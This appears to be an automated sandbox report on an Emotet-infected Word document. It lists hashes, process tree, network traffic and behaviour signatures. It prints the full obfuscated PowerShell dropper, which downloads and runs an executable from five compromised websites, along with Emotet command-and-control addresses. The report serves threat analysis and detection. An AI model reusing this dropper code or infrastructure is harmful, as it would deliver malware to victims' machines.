Analysis

  • max time kernel
    58s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    17-07-2020 20:12

General

  • Target

    0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89.doc

  • Size

    191KB

  • MD5

    ab90f80aca8f45bc67ac29acf47184a1

  • SHA1

    f9d314711608d6b8ba4781235bfcaab74d1c2017

  • SHA256

    0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89

  • SHA512

    c3718ea54f8113cc17364a11ea9aa315a67dd821d8204157af7811fae7feb227eb212d4f5cd50e629b8e2ef6a58edb9de5f16273941d15a601e494a784646c9d

Malware Config

Extracted

Language
ps1
Source
$noug='maultoezveukrioxbewxij';[Net.ServicePointManager]::"seCur`iTy`P`ROto`COl" = 'tls12, tls11, tls';$jaothpaoth = '870';$louqu='booyweejnealkeov';$dubkeokpip=$env:userprofile+'\'+$jaothpaoth+'.exe';$toaxnoirfietsounsiqu='xoequnool';$cuathcioy=&('new-ob'+'je'+'ct') net.WEbClIENT;$ceexthauchheif='https://www.20190607.com/wp-admin/ixyjozs/*https://lovely-lollies.com/wp-admin/fgvid/*https://www.angage.com/wp-content/mtincvc/*https://connect-plus.co.uk/aspnet_client/3yey3rr/*http://mapas.hoonicorns.pt/comp3/ly8cmti/'."SpL`it"([char]42);$quihjoufjeeploofmeov='loithmaichjoofnaet';foreach($yeeynoobniokgiohxurzaip in $ceexthauchheif){try{$cuathcioy."DoWN`lO`ADFILe"($yeeynoobniokgiohxurzaip, $dubkeokpip);$raequhuaxliajjeik='mew';If ((.('Ge'+'t-I'+'tem') $dubkeokpip)."Leng`TH" -ge 26887) {([wmiclass]'win32_Process')."cRe`AtE"($dubkeokpip);$siechietchuancoildeechtuach='thoun';break;$kuucpeadfeogdaezseuj='sakniorguzriognuuzcoth'}}catch{}}$heufrookriajtheulcieb='ziaqucoexthiezmuuc'
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/

exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/

exe.dropper

https://www.angage.com/wp-content/mtincvc/

exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/

exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0df5c512f9cae0cc043d8f969a770b3083214c46d9a51a71a9c36b128d69eb89.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1100
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e 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
    1⤵
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    PID:1060
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\SysWOW64\NlsLexicons0045\psbase.exe
      "C:\Windows\SysWOW64\NlsLexicons0045\psbase.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:288

Network

  • DNS
    www.20190607.com
    Remote address:
    8.8.8.8:53
    Request
    www.20190607.com
    IN A
    Response
    www.20190607.com
    IN A
    129.226.70.136
  • GET
    https://www.20190607.com/wp-admin/ixyjozs/
    powersheLL.exe
    Remote address:
    129.226.70.136:443
    Request
    GET /wp-admin/ixyjozs/ HTTP/1.1
    Host: www.20190607.com
    Connection: Keep-Alive
  • DNS
    apps.identrust.com
    Remote address:
    8.8.8.8:53
    Request
    apps.identrust.com
    IN A
    Response
    apps.identrust.com
    IN CNAME
    apps.digsigtrust.com
    apps.digsigtrust.com
    IN A
    192.35.177.64
  • GET
    http://apps.identrust.com/roots/dstrootcax3.p7c
    powersheLL.exe
    Remote address:
    192.35.177.64:80
    Request
    GET /roots/dstrootcax3.p7c HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: apps.identrust.com
    Response
    HTTP/1.1 200 OK
    Date: Thu, 16 Jul 2020 21:41:58 GMT
    Server: Apache
    X-XSS-Protection: 1; mode=block
    Strict-Transport-Security: max-age=15768000
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Content-Security-Policy: default-src 'self' *.identrust.com
    Cache-control: max-age=86400
    Last-Modified: Thu, 13 Feb 2020 15:25:43 GMT
    ETag: "37d-59e76b3c64bc0"
    Accept-Ranges: bytes
    Content-Length: 893
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Keep-Alive: timeout=5, max=100
    Content-Type: application/pkcs7-mime
  • DNS
    www.download.windowsupdate.com
    Remote address:
    8.8.8.8:53
    Request
    www.download.windowsupdate.com
    IN A
    Response
    www.download.windowsupdate.com
    IN CNAME
    wu-fg-shim.trafficmanager.net
    wu-fg-shim.trafficmanager.net
    IN CNAME
    2-01-3cf7-0009.cdx.cedexis.net
    2-01-3cf7-0009.cdx.cedexis.net
    IN CNAME
    cds.d2s7q6s2.hwcdn.net
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.42
    cds.d2s7q6s2.hwcdn.net
    IN A
    205.185.216.10
  • GET
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    powersheLL.exe
    Remote address:
    205.185.216.42:80
    Request
    GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
    Cache-Control: max-age = 3600
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Tue, 21 Apr 2020 00:50:26 GMT
    If-None-Match: "03582d87617d61:0"
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.download.windowsupdate.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 17 Jul 2020 20:12:25 GMT
    Connection: Keep-Alive
    Cache-Control: public, max-age=3600
    Content-Length: 58367
    Content-Type: application/vnd.ms-cab-compressed
    Last-Modified: Sat, 13 Jun 2020 20:53:32 GMT
    Accept-Ranges: bytes
    ETag: "06e9cb2c441d61:0"
    X-HW: 1595016745.dop153.am5.t,1595016745.cds131.am5.c
    X-CCC: NL
    X-CID: 9
  • DNS
    dns.msftncsi.com
    Remote address:
    8.8.8.8:53
    Request
    dns.msftncsi.com
    IN A
    Response
    dns.msftncsi.com
    IN A
    131.107.255.255
  • DNS
    dns.msftncsi.com
    Remote address:
    8.8.8.8:53
    Request
    dns.msftncsi.com
    IN AAAA
    Response
    dns.msftncsi.com
    IN AAAA
    fd3e:4f5a:5b81::1
  • 129.226.70.136:443
    https://www.20190607.com/wp-admin/ixyjozs/
    tls, http
    powersheLL.exe
    6.3kB
    295.7kB
    124
    206

    HTTP Request

    GET https://www.20190607.com/wp-admin/ixyjozs/
  • 192.35.177.64:80
    http://apps.identrust.com/roots/dstrootcax3.p7c
    http
    powersheLL.exe
    369 B
    1.6kB
    5
    3

    HTTP Request

    GET http://apps.identrust.com/roots/dstrootcax3.p7c

    HTTP Response

    200
  • 205.185.216.42:80
    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    http
    powersheLL.exe
    1.5kB
    60.5kB
    26
    45

    HTTP Request

    GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

    HTTP Response

    200
  • 109.117.53.230:443
    psbase.exe
    152 B
    3
  • 109.117.53.230:443
    psbase.exe
    104 B
    2
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 8.8.8.8:53
    www.20190607.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    www.20190607.com

    DNS Response

    129.226.70.136

  • 8.8.8.8:53
    apps.identrust.com
    dns
    64 B
    111 B
    1
    1

    DNS Request

    apps.identrust.com

    DNS Response

    192.35.177.64

  • 8.8.8.8:53
    www.download.windowsupdate.com
    dns
    76 B
    225 B
    1
    1

    DNS Request

    www.download.windowsupdate.com

    DNS Response

    205.185.216.42
    205.185.216.10

  • 224.0.0.252:5355
    100 B
    2
  • 239.255.255.250:1900
    966 B
    6
  • 8.8.8.8:53
    dns.msftncsi.com
    dns
    62 B
    78 B
    1
    1

    DNS Request

    dns.msftncsi.com

    DNS Response

    131.107.255.255

  • 8.8.8.8:53
    dns.msftncsi.com
    dns
    62 B
    90 B
    1
    1

    DNS Request

    dns.msftncsi.com

    DNS Response

    fd3e:4f5a:5b81::1

MITRE ATT&CK Enterprise v6

Downloads

  • memory/288-13-0x00000000003E0000-0x00000000003EC000-memory.dmp

    Filesize

    48KB

  • memory/1100-2-0x0000000008A30000-0x0000000008A34000-memory.dmp

    Filesize

    16KB

  • memory/1100-3-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1100-4-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1100-5-0x000000000B0A0000-0x000000000B0A4000-memory.dmp

    Filesize

    16KB

  • memory/1100-6-0x000000000C120000-0x000000000C124000-memory.dmp

    Filesize

    16KB

  • memory/1100-7-0x0000000006F00000-0x0000000007100000-memory.dmp

    Filesize

    2.0MB

  • memory/1716-10-0x00000000002E0000-0x00000000002EC000-memory.dmp

    Filesize

    48KB
